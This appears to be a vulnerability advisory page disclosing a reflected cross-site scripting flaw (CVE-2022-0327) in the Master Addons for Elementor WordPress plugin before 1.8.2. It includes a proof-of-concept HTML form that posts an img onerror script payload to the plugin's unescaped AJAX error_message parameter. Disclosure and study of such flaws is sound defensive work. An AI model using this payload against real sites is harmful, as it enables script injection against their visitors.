Lucene search
Krzysztof ZającWPEX-ID:DF38CC99-DA3C-4CC0-B179-1E52E841B883HistoryFeb 21, 2022 - 12:00 a.m.
Master Addons for Elementor < 1.8.2 - Reflected Cross-Site Scripting
2022-02-2100:00:00
Krzysztof Zając
79
0.001 Low
EPSS
Percentile
44.3%
The plugin does not sanitise and escape the error_message parameter before outputting it back in the response of the jltma_restrict_content AJAX action, available to unauthenticated and authenticated users, leading to a Reflected Cross-Site Scripting
<html>
<form action="https://example.com/wp-admin/admin-ajax.php?action=jltma_restrict_content" method="POST">
<input type="text" value="ma_el_rc_answer=x" name="fields">
<input type="text" value="math_captcha" name="restrict_type">
<input type="text" value="<img src onerror=alert(`XSS`)>" name="error_message">
<input type="submit" value="Send">
</form>
</html>Related
wpvulndb
wpvulndb
Master Addons for Elementor < 1.8.2 - Reflected Cross-Site Scripting
2022-02-21 00:00:00
patchstack
patchstack
prion
prion
Cross site scripting
2022-03-14 15:15:00
nvd
nvd
CVE-2022-0327
2022-03-14 15:15:09
cve
cve
CVE-2022-0327
2022-03-14 15:15:09
cnvd
cnvd
cvelist
cvelist